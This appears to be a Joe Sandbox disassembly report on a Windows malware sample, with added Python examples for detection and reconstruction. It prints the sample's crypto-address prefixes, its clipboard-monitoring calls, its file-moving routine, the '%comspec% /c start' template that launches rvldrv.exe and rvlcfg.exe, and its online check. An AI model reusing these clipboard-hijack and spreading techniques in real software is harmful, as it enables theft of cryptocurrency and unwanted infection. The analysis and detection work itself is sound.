                                                                                                                                    • String ID: 8$addr$addr$bc1p$bc1q$bitcoincash:$bitcoincash:$bitcoincash:$bnb$cosmos$cosmos$hA$nano_$nano_$ronin:$ronin:
                                                                                                                                    • API String ID: 2017104846-250561147
                                                                                                                                    • Opcode ID: 25dea65d1d4449a2ef1eae01c065bfd0f7a4c4a1741e3957523323aa1ae31655
                                                                                                                                    • Instruction ID: 6e0617124f46e3e1bef08e4e409f6ed46b9961a6860853f8336ff2275e542cf2
                                                                                                                                    • Opcode Fuzzy Hash: 25dea65d1d4449a2ef1eae01c065bfd0f7a4c4a1741e3957523323aa1ae31655
                                                                                                                                    • Instruction Fuzzy Hash: 609237B0A04218EACF58CF41C0945BE7BB2AF82751F60C06BE9456F294C77D8EC1DB99

                                                                                                                                    Control-flow Graph

                                                                                                                                    APIs
                                                                                                                                    Strings
                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 00000001.00000002.1839743453.0000000000401000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                    • Associated: 00000001.00000002.1839560572.0000000000400000.00000002.00000001.01000000.00000006.sdmp
                                                                                                                                    • Associated: 00000001.00000002.1839953222.0000000000410000.00000002.00000001.01000000.00000006.sdmp
                                                                                                                                    • Associated: 00000001.00000002.1840037472.0000000000414000.00000008.00000001.01000000.00000006.sdmp
                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                    • Snapshot File: hcaresult_1_2_400000_33080.jbxd
                                                                                                                                    Yara matches
                                                                                                                                    Similarity
                                                                                                                                    • API ID: _allshl_aullshr
                                                                                                                                    • String ID: Y
                                                                                                                                    • API String ID: 673498613-3233089245
                                                                                                                                    • Opcode ID: 535b8406bbf27203a3d06f507e019bd4b957b803c50952899959f8368776a3e9
                                                                                                                                    • Instruction ID: 8bc4f449e96fa991b651f766feedb24339ddc98edc011673b3c5a2d60d79d6a0
                                                                                                                                    • Opcode Fuzzy Hash: 535b8406bbf27203a3d06f507e019bd4b957b803c50952899959f8368776a3e9
                                                                                                                                    • Instruction Fuzzy Hash: 79D23A79D11619EFCB54CF99C18099EFBF1FF88320F62859AD845AB305C630AA95DF80

                                                                                                                                    Control-flow Graph

                                                                                                                                    APIs
                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 00000001.00000002.1839743453.0000000000401000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                    • Associated: 00000001.00000002.1839560572.0000000000400000.00000002.00000001.01000000.00000006.sdmp
                                                                                                                                    • Associated: 00000001.00000002.1839953222.0000000000410000.00000002.00000001.01000000.00000006.sdmp
                                                                                                                                    • Associated: 00000001.00000002.1840037472.0000000000414000.00000008.00000001.01000000.00000006.sdmp
                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                    • Snapshot File: hcaresult_1_2_400000_33080.jbxd
                                                                                                                                    Yara matches
                                                                                                                                    Similarity
                                                                                                                                    • API ID: _allshl_aullshr
                                                                                                                                    • String ID:
                                                                                                                                    • API String ID: 673498613-0
                                                                                                                                    • Opcode ID: 8c609b86bb28d5a081a49b133891f2681c0e63e2cb5ef732c119ad65bfffb674
                                                                                                                                    • Instruction ID: affa05b9e3e18e999c7216c09a62115e88c49fe898542c2adc9745ce68515915
                                                                                                                                    • Opcode Fuzzy Hash: 8c609b86bb28d5a081a49b133891f2681c0e63e2cb5ef732c119ad65bfffb674
                                                                                                                                    • Instruction Fuzzy Hash: 18D22A79D11619EFCB54CF99C18099EFBF1FF88320F62859AD845AB305C630AA95DF80

                                                                                                                                    Control-flow Graph

                                                                                                                                    [Control-flow graph image of the window procedure at 4059b0-405bfd (GetWindowLongW, SetClipboardViewer, IsClipboardFormatAvailable, OpenClipboard, GetClipboardData, RegisterRawInputDevices, ChangeClipboardChain, DefWindowProcA); legend: Executed / Not Executed]
                                                                                                                                    APIs
                                                                                                                                    • GetWindowLongW.USER32(?,000000EB), ref: 004059BC
                                                                                                                                    • SetClipboardViewer.USER32(?), ref: 00405A08
                                                                                                                                    • SetWindowLongW.USER32(?,000000EB,?), ref: 00405A1B
                                                                                                                                    • IsClipboardFormatAvailable.USER32(0000000D), ref: 00405A70
                                                                                                                                    • OpenClipboard.USER32(00000000), ref: 00405AB7
                                                                                                                                    • GetClipboardData.USER32(00000000), ref: 00405AC9
                                                                                                                                    • RegisterRawInputDevices.USER32(?,00000001,0000000C), ref: 00405BD0
                                                                                                                                    • ChangeClipboardChain.USER32(?,?), ref: 00405BDE
                                                                                                                                    • DefWindowProcA.USER32(?,?,?,?), ref: 00405BF4
                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 00000001.00000002.1839743453.0000000000401000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                    • Associated: 00000001.00000002.1839560572.0000000000400000.00000002.00000001.01000000.00000006.sdmp
                                                                                                                                    • Associated: 00000001.00000002.1839953222.0000000000410000.00000002.00000001.01000000.00000006.sdmp
                                                                                                                                    • Associated: 00000001.00000002.1840037472.0000000000414000.00000008.00000001.01000000.00000006.sdmp
                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                    • Snapshot File: hcaresult_1_2_400000_33080.jbxd
                                                                                                                                    Yara matches
                                                                                                                                    Similarity
                                                                                                                                    • API ID: Clipboard$Window$Long$AvailableChainChangeDataDevicesFormatInputOpenProcRegisterViewer
                                                                                                                                    • String ID:
                                                                                                                                    • API String ID: 3549449529-0
                                                                                                                                    • Opcode ID: 2f0b22ba391b773d4c45c64ac6dadd066d7720e91bacc99fadb97576ecf3cd51
                                                                                                                                    • Instruction ID: 96d86bc259bd628418629a5c2f452591d45261003c5ffeff5fe086a58ca8b5ae
                                                                                                                                    • Opcode Fuzzy Hash: 2f0b22ba391b773d4c45c64ac6dadd066d7720e91bacc99fadb97576ecf3cd51
                                                                                                                                    • Instruction Fuzzy Hash: EB711C75A00608EFDF14DFA4D988BEF77B4EB48300F14856AE506B7290D779AA40CF69

Control-flow Graph

Interactive graph not reproduced. Recoverable structure: function 004067a0 (basic blocks 4067a0-4068d2) calls CreateDirectoryW, wsprintfW and FindFirstFileW, loops over directory entries with lstrcmpW and FindNextFileW, for each entry calls wsprintfW twice and MoveFileExW, recurses into 004067a0 from block 40686e, and finishes with FindClose and RemoveDirectoryW.
APIs
• CreateDirectoryW.KERNEL32(00406F1A,00000000), ref: 004067AF
• wsprintfW.USER32 ref: 004067C5
• FindFirstFileW.KERNEL32(?,?), ref: 004067DC
• lstrcmpW.KERNEL32(?,00411368), ref: 00406801
• lstrcmpW.KERNEL32(?,0041136C), ref: 00406817
• wsprintfW.USER32 ref: 0040683A
• wsprintfW.USER32 ref: 0040685A
• MoveFileExW.KERNEL32(?,?,00000009), ref: 00406896
• FindNextFileW.KERNEL32(000000FF,?), ref: 004068AA
• FindClose.KERNEL32(000000FF), ref: 004068BF
• RemoveDirectoryW.KERNEL32(?), ref: 004068C9
Strings
Memory Dump Source
• Source File: 00000001.00000002.1839743453.0000000000401000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000001.00000002.1839560572.0000000000400000.00000002.00000001.01000000.00000006.sdmp
• Associated: 00000001.00000002.1839953222.0000000000410000.00000002.00000001.01000000.00000006.sdmp
• Associated: 00000001.00000002.1840037472.0000000000414000.00000008.00000001.01000000.00000006.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_1_2_400000_33080.jbxd
Yara matches
Similarity
• API ID: FileFindwsprintf$Directorylstrcmp$CloseCreateFirstMoveNextRemove
• String ID: %s\%s$%s\%s$%s\*
• API String ID: 92872011-445461498
• Opcode ID: e29d1c6c13065a126f61562b4b6d2eaef25e121113ba2b4fb370d418db62171d
• Instruction ID: 96f5080d1998a7d60275ba97af61759e4b4e94f5b4bc08b7936e0b3de653678a
• Opcode Fuzzy Hash: e29d1c6c13065a126f61562b4b6d2eaef25e121113ba2b4fb370d418db62171d
• Instruction Fuzzy Hash: 923145B5900218AFDB10DBA0DC88FDA7778BB48701F40C5E9F609A3195DA75EAD4CF98
APIs
• Sleep.KERNEL32(000003E8), ref: 00406F7E
• GetModuleFileNameW.KERNEL32(00000000,00415DB8,00000104), ref: 00406F90
  • Part of subcall function 0040F1F0: CreateFileW.KERNEL32(00406FA0,80000000,00000001,00000000,00000003,00000000,00000000,00406FA0), ref: 0040F210
  • Part of subcall function 0040F1F0: GetFileSize.KERNEL32(000000FF,00000000), ref: 0040F225
  • Part of subcall function 0040F1F0: CloseHandle.KERNEL32(000000FF), ref: 0040F232
• ExitThread.KERNEL32 ref: 004070FA
  • Part of subcall function 004063E0: GetLogicalDrives.KERNEL32 ref: 004063E6
  • Part of subcall function 004063E0: RegOpenKeyExW.ADVAPI32(80000002,Software\Microsoft\Windows\CurrentVersion\Policies\Explorer,00000000,00020019,?), ref: 00406434
  • Part of subcall function 004063E0: RegQueryValueExW.ADVAPI32(?,NoDrives,00000000,00000000,00000000,00000004), ref: 00406461
  • Part of subcall function 004063E0: RegCloseKey.ADVAPI32(?), ref: 0040647E
• Sleep.KERNEL32(000007D0), ref: 004070ED
  • Part of subcall function 00406300: lstrcpyW.KERNEL32(?,?,?,?,00000019), ref: 00406353
• GetVolumeInformationW.KERNEL32(?,?,00000105,00000000,00000000,?,00000000,00000000), ref: 0040702F
• GetDiskFreeSpaceExW.KERNEL32(?,00000000,?,00000000), ref: 00407044
• _aulldiv.NTDLL(?,?,40000000,00000000), ref: 0040705F
• wsprintfW.USER32 ref: 00407072
• wsprintfW.USER32 ref: 00407092
• wsprintfW.USER32 ref: 004070B5
Strings
Memory Dump Source
• Source File: 00000001.00000002.1839743453.0000000000401000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000001.00000002.1839560572.0000000000400000.00000002.00000001.01000000.00000006.sdmp
• Associated: 00000001.00000002.1839953222.0000000000410000.00000002.00000001.01000000.00000006.sdmp
• Associated: 00000001.00000002.1840037472.0000000000414000.00000008.00000001.01000000.00000006.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_1_2_400000_33080.jbxd
Yara matches
Similarity
• API ID: Filewsprintf$CloseSleep$CreateDiskDrivesExitFreeHandleInformationLogicalModuleNameOpenQuerySizeSpaceThreadValueVolume_aulldivlstrcpy
• String ID: (%dGB)$%s%s$Unnamed volume
• API String ID: 1650488544-2117135753
• Opcode ID: 36835f4b582c7264fa9310f82983a243ead37fe316eb445b52cb330bcd55ef35
• Instruction ID: b797a4b926279b24144ff746e96c568fb56fd9e530b7e1178aba5a8e6206bca3
• Opcode Fuzzy Hash: 36835f4b582c7264fa9310f82983a243ead37fe316eb445b52cb330bcd55ef35
• Instruction Fuzzy Hash: 244174B1D00214BBEB64DB94DC45FEE7779BB48700F1085A6F20AB61D0DA785B84CF6A
APIs
• socket.WS2_32(00000002,00000002,00000011), ref: 0040E1AA
• htons.WS2_32(0000076C), ref: 0040E1E0
• inet_addr.WS2_32(239.255.255.250), ref: 0040E1EF
• setsockopt.WS2_32(000000FF,0000FFFF,00000020,00000001,00000001), ref: 0040E20D
  • Part of subcall function 0040B430: htons.WS2_32(00000050), ref: 0040B45D
  • Part of subcall function 0040B430: socket.WS2_32(00000002,00000001,00000000), ref: 0040B47D
  • Part of subcall function 0040B430: connect.WS2_32(000000FF,?,00000010), ref: 0040B496
  • Part of subcall function 0040B430: getsockname.WS2_32(000000FF,?,00000010), ref: 0040B4C8
• bind.WS2_32(000000FF,?,00000010), ref: 0040E243
• lstrlenA.KERNEL32(X#A,00000000,?,00000010), ref: 0040E25C
• sendto.WS2_32(000000FF,X#A,00000000), ref: 0040E26B
• ioctlsocket.WS2_32(000000FF,8004667E,00000001), ref: 0040E285
  • Part of subcall function 0040E310: recvfrom.WS2_32(000000FF,?,00000400,00000000,00000000,00000000), ref: 0040E35E
  • Part of subcall function 0040E310: Sleep.KERNEL32(000003E8), ref: 0040E36E
  • Part of subcall function 0040E310: StrCmpNIA.SHLWAPI(?,HTTP/1.1 200 OK,0000000F), ref: 0040E38B
  • Part of subcall function 0040E310: StrStrIA.SHLWAPI(?,LOCATION: ), ref: 0040E3A1
  • Part of subcall function 0040E310: StrChrA.SHLWAPI(?,0000000D), ref: 0040E3CE
Strings
Memory Dump Source
• Source File: 00000001.00000002.1839743453.0000000000401000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000001.00000002.1839560572.0000000000400000.00000002.00000001.01000000.00000006.sdmp
• Associated: 00000001.00000002.1839953222.0000000000410000.00000002.00000001.01000000.00000006.sdmp
• Associated: 00000001.00000002.1840037472.0000000000414000.00000008.00000001.01000000.00000006.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_1_2_400000_33080.jbxd
Yara matches
Similarity
• API ID: htonssocket$Sleepbindconnectgetsocknameinet_addrioctlsocketlstrlenrecvfromsendtosetsockopt
• String ID: 239.255.255.250$X#A
• API String ID: 726339449-2206458040
• Opcode ID: 6911e90d37da8db62bd51864f6155ca9886bbc89aad1387f27fc75aef26ea545
• Instruction ID: e8e0ae0e245dd7c097b927a75a8676c49a2f7ecfee9f68fb0cb72d84dadb0e27
• Opcode Fuzzy Hash: 6911e90d37da8db62bd51864f6155ca9886bbc89aad1387f27fc75aef26ea545
• Instruction Fuzzy Hash: 7F4119B4E00208ABDB04DFE4D989BEEBBB5EF48304F108569F505B7390E7B55A44CB59
APIs
• GetSystemInfo.KERNEL32(?,?), ref: 00402043
• InitializeCriticalSection.KERNEL32(00000020), ref: 00402057
• CreateEventA.KERNEL32(00000000,00000001,00000000,00000000), ref: 00402065
• CreateIoCompletionPort.KERNEL32(000000FF,00000000,00000000,00000000), ref: 0040207E
  • Part of subcall function 0040DBB0: InitializeCriticalSection.KERNEL32(-00000004), ref: 0040DBCE
• WSASocketA.WS2_32(00000002,00000001,00000006,00000000,00000000,00000001), ref: 004020AB
• setsockopt.WS2_32 ref: 004020D1
• htons.WS2_32(?), ref: 00402101
• bind.WS2_32(?,0000FFFF,00000010), ref: 00402117
• listen.WS2_32(?,7FFFFFFF), ref: 0040212F
• WSACreateEvent.WS2_32 ref: 0040213A
• WSAEventSelect.WS2_32(?,00000000,00000008), ref: 0040214E
  • Part of subcall function 0040DBE0: EnterCriticalSection.KERNEL32(-00000004,00000000), ref: 0040DC04
  • Part of subcall function 0040DBE0: CreateThread.KERNEL32(00000000,?,00000000,?,00000000,?), ref: 0040DC5F
  • Part of subcall function 0040DBE0: GetCurrentProcess.KERNEL32(00000000,00000000,00000000,00000002), ref: 0040DC9C
  • Part of subcall function 0040DBE0: GetCurrentProcess.KERNEL32(00000000,00000000), ref: 0040DCA7
  • Part of subcall function 0040DBE0: DuplicateHandle.KERNEL32(00000000), ref: 0040DCAE
  • Part of subcall function 0040DBE0: LeaveCriticalSection.KERNEL32(-00000004), ref: 0040DCC2
Memory Dump Source
• Source File: 00000001.00000002.1839743453.0000000000401000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000001.00000002.1839560572.0000000000400000.00000002.00000001.01000000.00000006.sdmp
• Associated: 00000001.00000002.1839953222.0000000000410000.00000002.00000001.01000000.00000006.sdmp
• Associated: 00000001.00000002.1840037472.0000000000414000.00000008.00000001.01000000.00000006.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_1_2_400000_33080.jbxd
Yara matches
Similarity
• API ID: CreateCriticalSection$Event$CurrentInitializeProcess$CompletionDuplicateEnterHandleInfoLeavePortSelectSocketSystemThreadbindhtonslistensetsockopt
• String ID:
• API String ID: 1603358586-0
• Opcode ID: 12e9ac71e1e64606d6e310d867efcd3aad974152cf34b1f89b4218bf20e906ed
• Instruction ID: 7304e093e5df1f4af0f3941d52a0ba2ce6ba101da239ecb0b9d238ba0c2be26e
• Opcode Fuzzy Hash: 12e9ac71e1e64606d6e310d867efcd3aad974152cf34b1f89b4218bf20e906ed
• Instruction Fuzzy Hash: EE41B170640301ABD3209F74CC4AF5B77E4AF44720F108A2DF6A9EA2D4E7F4E545875A
                                                                                                                                    APIs
                                                                                                                                    • CoInitialize.OLE32(00000000), ref: 0040666B
                                                                                                                                    • CoCreateInstance.OLE32(00413030,00000000,00000001,00413010,00000008), ref: 00406683
                                                                                                                                    • wsprintfW.USER32 ref: 004066C4
                                                                                                                                    • wsprintfW.USER32 ref: 004066E5
                                                                                                                                    Strings
                                                                                                                                    • cl@, xrefs: 004066A0
                                                                                                                                    • %comspec%, xrefs: 004066EE
                                                                                                                                    • /c start %s & start %s\rvldrv.exe & start %s\rvlcfg.exe, xrefs: 004066B8
                                                                                                                                    • /c start %s & start %s\rvlcfg.exe, xrefs: 004066D9
                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 00000001.00000002.1839743453.0000000000401000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                    • Associated: 00000001.00000002.1839560572.0000000000400000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                    • Associated: 00000001.00000002.1839953222.0000000000410000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                    • Associated: 00000001.00000002.1840037472.0000000000414000.00000008.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                    • Snapshot File: hcaresult_1_2_400000_33080.jbxd
                                                                                                                                    Yara matches
                                                                                                                                    Similarity
                                                                                                                                    • API ID: wsprintf$CreateInitializeInstance
                                                                                                                                    • String ID: %comspec%$/c start %s & start %s\rvlcfg.exe$/c start %s & start %s\rvldrv.exe & start %s\rvlcfg.exe$cl@
                                                                                                                                    • API String ID: 1147330536-497122036
                                                                                                                                    • Opcode ID: eee1a2fc8572b98f6c40a5fc3c9db374d26e8a3e47ee9b9990b59bb952fb1ff2
                                                                                                                                    • Instruction ID: e126a915917d584c7bd6e3cca15df18ca7e9be12ab45cc4692bb8e15b90f0fb7
                                                                                                                                    • Opcode Fuzzy Hash: eee1a2fc8572b98f6c40a5fc3c9db374d26e8a3e47ee9b9990b59bb952fb1ff2
                                                                                                                                    • Instruction Fuzzy Hash: 67411D75A40208AFC704DF98C885FDEB7B5AF88704F208199F515A72A5C675AE81CB54
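The String IDs above (`%comspec%`, `/c start %s & start %s\rvlcfg.exe`, `/c start %s & start %s\rvldrv.exe & start %s\rvlcfg.exe`) are the wsprintf templates for the launch chain: every `%s` receives the same directory, the first `start` opens that folder in Explorer, and the following `start` calls run the dropped executables beside it. The detection below is an added example written for this page, not code from the sample or from the Joe Sandbox report. The event records are constructed in Sysmon Event ID 1 style and the directory `E:\DCIM` is a hypothetical stand-in for the runtime `%s` value; the only strings taken from the page are `rvlcfg.exe`, `rvldrv.exe` and the `/c start` chain itself.

```python
import re
from typing import Dict, List

# Launch-chain shape from the String IDs in the listing.  wsprintf fills each
# %s with the same directory, so a backreference (?P=dir) ties every slot to
# the first one; a chain whose directories differ is not the sample's pattern.
START_CHAIN = re.compile(
    r"(?i)\bcmd(?:\.exe)?\"?\s+/c\s+start\s+(?P<dir>[^&\s]+)"      # cmd /c start <dir>
    r"(?:\s*&\s*start\s+(?P=dir)\\(?:rvlcfg|rvldrv)\.exe)+\s*$"     # & start <dir>\rvl*.exe ...
)


def is_phorpiex_start_chain(command_line: str) -> bool:
    """True when a cmd.exe command line has the '/c start <dir> & start <dir>\\rvl*.exe'
    shape with the same directory reused in every slot, as wsprintf would produce."""
    return START_CHAIN.search(command_line) is not None


def scan(events: List[Dict[str, str]]) -> List[str]:
    """Return the command lines of cmd.exe process-creation events that match."""
    return [
        ev["CommandLine"]
        for ev in events
        if ev.get("Image", "").lower().endswith("\\cmd.exe")
        and is_phorpiex_start_chain(ev.get("CommandLine", ""))
    ]


# Constructed process-creation events (Sysmon Event ID 1 style).  E:\DCIM is a
# hypothetical directory standing in for the %s argument; it is not from the report.
SAMPLE_EVENTS = [
    {"Image": r"C:\Windows\System32\cmd.exe",
     "CommandLine": r"C:\Windows\System32\cmd.exe /c start E:\DCIM & start E:\DCIM\rvldrv.exe & start E:\DCIM\rvlcfg.exe"},
    {"Image": r"C:\Windows\System32\cmd.exe",
     "CommandLine": r"cmd /c start E:\DCIM & start E:\DCIM\rvlcfg.exe"},
    {"Image": r"C:\Windows\System32\cmd.exe",
     "CommandLine": r"cmd /c start E:\DCIM & start E:\Other\rvlcfg.exe"},  # directories differ: not the wsprintf shape
    {"Image": r"C:\Windows\System32\cmd.exe",
     "CommandLine": r"cmd /c dir C:\Users"},
]


if __name__ == "__main__":
    for hit in scan(SAMPLE_EVENTS):
        print("MATCH:", hit)
```

Only the first two constructed events match; the third reuses the executable name but not the single-directory template, which is the property worth keying on because the file names alone are easy for a variant to change while the `wsprintf` layout is part of the code.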
                                                                                                                                    APIs
                                                                                                                                    • CreateEventA.KERNEL32(00000000,00000001,00000000,00000000), ref: 004014B2
                                                                                                                                    • socket.WS2_32(00000002,00000002,00000011), ref: 004014C1
                                                                                                                                    • htons.WS2_32(?), ref: 00401508
                                                                                                                                    • setsockopt.WS2_32(?,0000FFFF), ref: 0040152A
                                                                                                                                    • bind.WS2_32(?,?,00000010), ref: 0040153B
                                                                                                                                      • Part of subcall function 00401330: SetEvent.KERNEL32(?,00000000,?,0040154C,00000000), ref: 00401346
                                                                                                                                      • Part of subcall function 00401330: WaitForSingleObject.KERNEL32(?,000000FF), ref: 00401352
                                                                                                                                      • Part of subcall function 00401330: CloseHandle.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 0040135C
                                                                                                                                    • CreateThread.KERNEL32(00000000,00000000,00401100,00000000,00000000,00000000), ref: 00401569
                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 00000001.00000002.1839743453.0000000000401000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                    • Associated: 00000001.00000002.1839560572.0000000000400000.00000002.00000001.01000000.00000006.sdmp
                                                                                                                                    • Associated: 00000001.00000002.1839953222.0000000000410000.00000002.00000001.01000000.00000006.sdmp
                                                                                                                                    • Associated: 00000001.00000002.1840037472.0000000000414000.00000008.00000001.01000000.00000006.sdmp
                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                    • Snapshot File: hcaresult_1_2_400000_33080.jbxd
                                                                                                                                    Yara matches
                                                                                                                                    Similarity
                                                                                                                                    • API ID: CreateEvent$CloseHandleObjectSingleThreadWaitbindhtonssetsockoptsocket
                                                                                                                                    • String ID:
                                                                                                                                    • API String ID: 4174406920-0
                                                                                                                                    • Opcode ID: 93d4027be7e49e3bb9003fc5ae654a5e9afe1d061a8d67f74f828f69ef3a14c4
                                                                                                                                    • Instruction ID: 62ed05d6da85abd953b38b2f92cd08377c0ec6205023cd889ce16e316194a11c
                                                                                                                                    • Opcode Fuzzy Hash: 93d4027be7e49e3bb9003fc5ae654a5e9afe1d061a8d67f74f828f69ef3a14c4
                                                                                                                                    • Instruction Fuzzy Hash: 1731F971A443016BE320DF749C46F9BB6E0AF48B10F40493DF659EB2D0D3B4D544879A
                                                                                                                                    APIs
                                                                                                                                    • GetTickCount.KERNEL32 ref: 0040D782
                                                                                                                                    • ioctlsocket.WS2_32(00000004,4004667F,00000000), ref: 0040D7A8
                                                                                                                                    • recv.WS2_32(00000004,00002710,000000FF,00000000), ref: 0040D7DF
                                                                                                                                    • GetTickCount.KERNEL32 ref: 0040D7F4
                                                                                                                                    • Sleep.KERNEL32(00000001), ref: 0040D814
                                                                                                                                    • GetTickCount.KERNEL32 ref: 0040D81A
                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 00000001.00000002.1839743453.0000000000401000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                    • Associated: 00000001.00000002.1839560572.0000000000400000.00000002.00000001.01000000.00000006.sdmp
                                                                                                                                    • Associated: 00000001.00000002.1839953222.0000000000410000.00000002.00000001.01000000.00000006.sdmp
                                                                                                                                    • Associated: 00000001.00000002.1840037472.0000000000414000.00000008.00000001.01000000.00000006.sdmp
                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                    • Snapshot File: hcaresult_1_2_400000_33080.jbxd
                                                                                                                                    Yara matches
                                                                                                                                    Similarity
                                                                                                                                    • API ID: CountTick$Sleepioctlsocketrecv
                                                                                                                                    • String ID:
                                                                                                                                    • API String ID: 107502007-0
                                                                                                                                    • Opcode ID: 37a822bdddda98564e28443683f910c137df2279eb61dd0ccc6bd5f83a2e5522
                                                                                                                                    • Instruction ID: 457d80db37ae817004d1223b894239af033459ee6c7143085fc0b5fbd1cdb933
                                                                                                                                    • Opcode Fuzzy Hash: 37a822bdddda98564e28443683f910c137df2279eb61dd0ccc6bd5f83a2e5522
                                                                                                                                    • Instruction Fuzzy Hash: 13310A75D00209EFCB04DFA4D948AEEBBB0FF44315F10866AE821A7280D7749A54CB99
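The sequence GetTickCount, ioctlsocket, recv, GetTickCount, Sleep(1), GetTickCount is a polling receive with a timeout. The ioctlsocket request code 4004667F in the listing is Winsock's FIONREAD (not FIONBIO, which is 8004667E): it reports how many bytes are queued without consuming them, so the function can poll, recv only when data is waiting, and otherwise sleep a millisecond and compare the tick count against a deadline. The reconstruction below is an added example written for this page, not code from the sample or from the Joe Sandbox report. It substitutes an AF_UNIX socketpair and a constructed payload for the sample's UDP socket so it runs offline; the buffer length and timeout values are assumptions, since the listing does not let them be recovered with certainty.

```python
import fcntl
import socket
import struct
import termios
import time
from typing import Optional, Tuple

# Constructed stand-in for whatever the peer would send on the sample's socket.
SAMPLE_PAYLOAD = b"constructed test datagram"


def pending_bytes(sock: socket.socket) -> int:
    """Equivalent of ioctlsocket(s, FIONREAD, &n) (request 0x4004667F on Winsock):
    ask the kernel how many bytes are queued on the socket without reading them."""
    buf = bytearray(4)
    fcntl.ioctl(sock.fileno(), termios.FIONREAD, buf)
    return struct.unpack("i", buf)[0]


def recv_with_timeout(sock: socket.socket, max_len: int, timeout_ms: int) -> Optional[bytes]:
    """Polling receive in the shape of the listed function: take the clock at
    entry (first GetTickCount), check FIONREAD, recv() if data is queued,
    otherwise Sleep(1) and re-read the clock until the deadline passes.
    Returns None on timeout.  timeout_ms and max_len are assumed values."""
    deadline = time.monotonic() + timeout_ms / 1000.0
    while True:
        if pending_bytes(sock) > 0:
            return sock.recv(max_len)
        time.sleep(0.001)                   # Sleep(1)
        if time.monotonic() >= deadline:    # later GetTickCount compared to the deadline
            return None


def demo() -> Tuple[Optional[bytes], Optional[bytes]]:
    """Exercise the loop once with data already queued and once against silence."""
    a, b = socket.socketpair()
    try:
        b.sendall(SAMPLE_PAYLOAD)
        got = recv_with_timeout(a, 10000, timeout_ms=500)   # data waiting: returns immediately
        nothing = recv_with_timeout(a, 10000, timeout_ms=50)  # nothing queued: times out
    finally:
        a.close()
        b.close()
    return got, nothing


if __name__ == "__main__":
    print(demo())
```

The practical point for an analyst is that this function never blocks in recv: a sandbox or debugger that hooks recv alone will see it called only when a datagram is already queued, and the idle case is a tight FIONREAD/Sleep(1) spin until the tick deadline.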
                                                                                                                                    APIs
                                                                                                                                    • htons.WS2_32(00000050), ref: 0040B45D
                                                                                                                                      • Part of subcall function 0040B3F0: inet_addr.WS2_32(0040B471), ref: 0040B3FA
                                                                                                                                      • Part of subcall function 0040B3F0: gethostbyname.WS2_32(?), ref: 0040B40D
                                                                                                                                    • socket.WS2_32(00000002,00000001,00000000), ref: 0040B47D
                                                                                                                                    • connect.WS2_32(000000FF,?,00000010), ref: 0040B496
                                                                                                                                    • getsockname.WS2_32(000000FF,?,00000010), ref: 0040B4C8
                                                                                                                                    Strings
                                                                                                                                    • www.update.microsoft.com, xrefs: 0040B467
                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 00000001.00000002.1839743453.0000000000401000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                    • Associated: 00000001.00000002.1839560572.0000000000400000.00000002.00000001.01000000.00000006.sdmp
                                                                                                                                    • Associated: 00000001.00000002.1839953222.0000000000410000.00000002.00000001.01000000.00000006.sdmp
                                                                                                                                    • Associated: 00000001.00000002.1840037472.0000000000414000.00000008.00000001.01000000.00000006.sdmp
                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                    • Snapshot File: hcaresult_1_2_400000_33080.jbxd
                                                                                                                                    Yara matches
                                                                                                                                    Similarity
                                                                                                                                    • API ID: connectgethostbynamegetsocknamehtonsinet_addrsocket
                                                                                                                                    • String ID: www.update.microsoft.com
                                                                                                                                    • API String ID: 4063137541-1705189816
                                                                                                                                    • Opcode ID: 6e98f9c7e97e06aef12c993c0efbc8d88427d4f6baa20c341407c54d3fa54141
                                                                                                                                    • Instruction ID: af49af799945b34e8f77a8241ecd355db6f1f506d792f0fdd03f8566860bb8e6
                                                                                                                                    • Opcode Fuzzy Hash: 6e98f9c7e97e06aef12c993c0efbc8d88427d4f6baa20c341407c54d3fa54141
                                                                                                                                    • Instruction Fuzzy Hash: DB212CB4D102099BCB04DFE8D946AEEBBB4EF48300F104169E514F7390E7B45A44DBAA
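The function above is the connectivity check the report flags: htons(0x50) is port 80, the subcall at 0040B3F0 resolves `www.update.microsoft.com` with inet_addr first and gethostbyname as fallback, then socket/connect/getsockname follow with no send in the listing. A successful connect tells the sample the host is online, and getsockname on the connected socket returns the local interface address the OS chose for that route, which is a common way for malware to learn its own outbound IP. The following reconstruction is an added example written for this page, not code from the sample or from the Joe Sandbox report; it keeps the host and port from the listing as defaults and, to run offline, exercises the probe against a constructed loopback listener rather than the real Microsoft host.

```python
import socket
from typing import Optional, Tuple

# Target taken from the listing: www.update.microsoft.com, TCP port 80 (htons(0x50)).
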